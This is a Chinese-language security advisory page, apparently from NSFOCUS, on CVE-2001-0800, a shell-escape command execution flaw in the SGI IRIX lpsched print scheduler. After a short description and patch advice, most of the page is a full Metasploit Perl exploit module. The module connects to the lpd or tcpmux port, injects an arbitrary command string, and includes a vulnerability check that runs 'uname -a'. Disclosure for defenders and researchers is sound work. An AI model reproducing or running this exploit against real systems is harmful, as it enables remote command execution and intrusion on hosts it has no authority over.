首页 -> 安全研究
安全研究
安全漏洞
SGI IRIX lpsched远程命令执行漏洞
发布日期:2002-02-14
更新日期:2002-02-14
受影响系统:
SGI IRIX 6.5.9描述:
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 5.3
CVE ID: CVE-2001-0800
IRIX是一款由SGI公司开发和维护的商业性质UNIX操作系统。
IRIX的打印调度守护进程lpsched实现上存在问题,远程攻击者可能利用此漏洞以lpsched进程的执行权限执行任意命令。
通过向lpsched进程提交带有Shell转义字符的字串,可以在系统上执行Shell命令。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::irix_lpsched_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = {};
my $info = {
'Name' => 'IRIX lpsched Command Execution',
'Version' => '$Revision: 1.9 $',
'Authors' =>
[
'Optyx <optyx [at] uberhax0r.net>',
'LSD <http://www.lsd-pl.net>'
],
'Arch' => [],
'OS' => ['irix'],
'Priv' => 1,
'Payload' =>
{
'Space' => 4096,
'Keys' => ['cmd'],
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The lpsched target port', 515],
'TCPMUX' => [0, 'BOOL', 'Use tcpmux to indirectly exploit', 0],
},
'Description' => Pex::Text::Freeform(qq{
This is YASGIPB (yet another SGI popen bug). This exploit requires
the ability to bind to a privileged TCP port (less than 1024). On
most Unix systems, this is only possible when you are running as
the root user.
}),
'Refs' =>
[
['OSVDB', '8573'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
['MIL', '35'],
],
'DefaultTarget' => 0,
'Targets' => [["No Target Needed"]],
'Keys' => ['lpd'],
'DisclosureDate' => 'Sep 1 2001',
};
sub new {
my $class = shift;
my $self =
$class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return ($self);
}
sub Check {
my $self = shift;
$self->LPDSchedQuery(1);
}
sub Exploit {
my $self = shift;
$self->LPDSchedQuery;
}
sub LPDSchedQuery {
my $self = shift;
my $check = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_tcpmux = $self->GetVar('TCPMUX');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $command = $check ? "uname -a;" : $encodedPayload->RawPayload;
my $s;
# The TCPMUX service is always on port 1
if ($target_tcpmux) {
$target_port = 1;
}
$s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
if ($s->IsError) {
$self->PrintLine("[*] Error creating socket: ".$s->GetError);
return $check ? $self->CheckCode('Connect') : undef;
}
if ($target_tcpmux) {
$s->Send("sgi_printer\n");
$s->Recv(-1, 30);
}
$self->PrintLine("[*] Executing command...");
$s->Send("T;$command;\n");
my $res = $s->Recv(-1, 5);
print $res;
if ($check) {
my $res = $s->Recv(-1, 5);
$s->Close;
if ($res =~ /IRIX/) {
$self->PrintLine("[*] Vulnerable system detected");
return $self->CheckCode('Confirmed');
}
else {
$self->PrintLine("[*] This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
}
# XXX what response does a patched system give?
# XXX can we close the socket without killing any running command?
# $s->Close;
# XXX should we do one more recv and print the response?
return;
}
1;
建议:
厂商补丁:
SGI
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sgi.com/support/security/
浏览次数:3144
严重程度:0(网友投票)
绿盟科技给您安全的保障